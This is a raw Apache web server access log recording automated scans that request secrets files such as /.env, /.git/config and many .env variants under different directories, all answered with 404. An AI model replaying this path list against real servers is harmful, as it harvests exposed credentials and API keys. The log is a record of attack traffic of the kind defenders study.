176.65.137.206 - - [08/Feb/2025:01:58:46 +0200] "GET /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0 (X11; Linux x86_64)"
3.99.188.60 - - [08/Feb/2025:02:05:40 +0200] "GET /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
::1 - - [08/Feb/2025:02:05:58 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [08/Feb/2025:02:05:59 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [08/Feb/2025:02:06:00 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
45.141.215.36 - - [08/Feb/2025:02:14:51 +0200] "GET /.git/config HTTP/1.1" 404 209 "-" "python-requests/2.28.1"
45.141.215.36 - - [08/Feb/2025:02:14:51 +0200] "GET /api/.env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.141.215.36 - - [08/Feb/2025:02:14:51 +0200] "POST /api/.env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.141.215.36 - - [08/Feb/2025:02:14:51 +0200] "GET /back/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.141.215.36 - - [08/Feb/2025:02:14:51 +0200] "POST /back/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.141.215.36 - - [08/Feb/2025:02:14:51 +0200] "GET /enviroments/.env.production HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.141.215.36 - - [08/Feb/2025:02:14:51 +0200] "POST /enviroments/.env.production HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.141.215.36 - - [08/Feb/2025:02:14:51 +0200] "GET /live_env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.141.215.36 - - [08/Feb/2025:02:14:51 +0200] "POST /live_env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.141.215.36 - - [08/Feb/2025:02:14:51 +0200] "GET /development/.env HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.141.215.36 - - [08/Feb/2025:02:14:51 +0200] "POST /development/.env HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.141.215.36 - - [08/Feb/2025:02:14:51 +0200] "GET /cms/.env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.141.215.36 - - [08/Feb/2025:02:14:51 +0200] "POST /cms/.env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.141.215.36 - - [08/Feb/2025:02:14:52 +0200] "GET /.env.dist HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.141.215.36 - - [08/Feb/2025:02:14:52 +0200] "POST /.env.dist HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.141.215.36 - - [08/Feb/2025:02:14:52 +0200] "GET /local/.env HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.141.215.36 - - [08/Feb/2025:02:14:52 +0200] "POST /local/.env HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.141.215.36 - - [08/Feb/2025:02:14:52 +0200] "GET /fedex/.env HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.141.215.36 - - [08/Feb/2025:02:14:52 +0200] "POST /fedex/.env HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
